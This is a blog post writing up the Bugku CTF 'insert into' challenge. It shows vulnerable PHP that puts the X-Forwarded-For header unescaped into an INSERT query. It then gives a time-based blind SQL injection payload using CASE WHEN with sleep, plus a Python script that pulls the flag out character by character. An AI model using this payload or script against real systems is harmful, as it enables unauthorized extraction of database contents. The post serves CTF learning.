bugku insert into 注入

题目源码:

  

flag格式:flag{xxxxxxxxxxxx}
不如写个Python吧

error_reporting(0);

function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];

}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);

 

 

 

XFF因为只有Insert没有输出所以使用延迟注入,逗号过滤 ,无法使用If,所以使用:

select case when xxx then xxx else xxx end; 

 

 

POCURL=

"127.0.0.1'+(select case when substr((select flag from flag) from {0} for 1)='{1}' then sleep(5) else 0 end))#"

( {0} {1} 标注点为循环点,使用format()函数进行替换。)

 

import requests
import sys
#python3.6
url
='http://123.206.87.240:8002/web15/' sql="127.0.0.1'+(select case when substr((select flag from flag) from {0} for 1)='{1}' then sleep(5) else 0 end))#" flag='' #strtest="TEST{0}+{1}" for i in range(1,40): for ch in range (32,129): if ch ==128: sys.exit(0) xff=sql.format(i,chr(ch)) #print(xff) headers={ 'X-Forwarded-For':xff } print('这是第'+str(i)+'轮,'+''+str(ch)+'次进行猜测') try: re = requests.get(url,headers=headers,timeout=3) except: flag += chr(ch) print('flag:'+flag) break #注:flag跑出来字母是大写,实际为小写。 #注:由于网络不好,延迟太高先使用虚拟机跑结果完全不对,后来换用本机成功。

 

参考:https://blog.csdn.net/xuchen16/article/details/82904488


posted @ 2019-09-06 19:31  Zhu013  阅读(674)  评论(0编辑  收藏  举报